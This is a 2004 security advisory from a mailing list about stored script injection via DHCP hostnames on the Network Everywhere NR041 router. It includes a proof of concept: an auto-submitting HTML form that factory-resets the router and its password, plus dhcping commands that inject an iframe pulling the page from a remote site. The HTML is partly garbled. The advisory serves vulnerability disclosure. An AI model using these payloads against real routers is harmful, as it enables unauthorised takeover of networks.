[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP

From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/04

  • Next message: SecuriTeam: "[EXPL] Courier-IMAP Remote Format String Vulnerability Exploit"
    To: list@securiteam.com
    Date: 2 Sep 2004 12:55:40 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      NetworkEverywhere Router Model NR041 Script Injection via DHCP


     <http://www.networkeverywhere.com/products/nr041.asp> The Network
    Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your
    Cable or DSL modem. The router lets your PCs share one IP address from
    your ISP, files, printers and other resources. It can also function as a
    DHCP server for easy IP assignment".

    DHCP HOSTNAME options originating from clients aren't properly filtered
    for malicious content. Due to this fact, malicious script code can be
    injected and stored on the router.


    Vulnerable Systems:
     * NR041 firmware revision 1.2 release 03

    Since the router doesn't filter out potentially problematic content it is
    easily possible to inject script code into the web-based administrative
    interface. At such a time when the administrator consults the DHCP
    interface, the script code will be executed in the open session by the
    browser and due to the nature of the session, will have full access to the
    router. One possible and easily executed attack is to cause the script to
    reset the router to its factory defaults, rolling back the administration
    password as well.

    Since the DHCP daemon is only accessible from within a local network it
    would be hard to exploit. However, if a way exists to issue DHCP requests
    to the router, this vulnerability can be exploited.

    A proof of concept can be carried out using DHCPing, available from
    <http://c3rb3r.openwall.net/dhcping/> http://c3rb3r.openwall.net/dhcping/.

    As mentioned above, the NR041 is configurable via a web based
    administrative interface using several CGIs and invoked with the HTTP POST
    method. It isn't entirely easy to exploit under the circumstances (15
    character string which you cannot break where ever you wish) but a known
    trick from the exploitation of the DLINK 614+ can be used for assistance.

     * Step 1:
    Because there isn't enough room to perform adequate exploitation in one
    shot, a different approach can be used. Injecting code for an IFRAME that
    will force the browser to to remotely call a certain HTML file, i.e.:
    "a.htm" on a malicious website. This file contains a form which will
    auto-submit itself when loaded. The code for such an HTML file is
    presented below. However it is important to note that due to length
    limitations the filename should be as short as possible:
    < html>< head>
    < script language="JavaScript">
    function SymError()
      return true;
    window.onerror = SymError;
    <script language="javascript">
    function autopost(){
    </head><body onload="javascript:document.xx.submit();">
    < form name=xx method=post action="">
    < input type=hidden name=FactoryDefaults value="Enable">

    The actual attack carried out by this HTML file is to call passwd.cgi with
    the "factorydefaults" option enabled. Notice that the IP is hardcoded in
    this file but it can actually be obtained from the HTTP referrer header,
    making this script work seamlessly.

     * Step 2:
    Inject the script containing the IFRAME using DHCPing, like so:

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "/../a.htm' > " -m af:af:af:af:af:af

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "<iframe id=' " -m af:af:af:af:af:ad


    The information has been provided by <mailto:Daemonz@videotron.ca>
    Mathieu Lacroix.


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Courier-IMAP Remote Format String Vulnerability Exploit"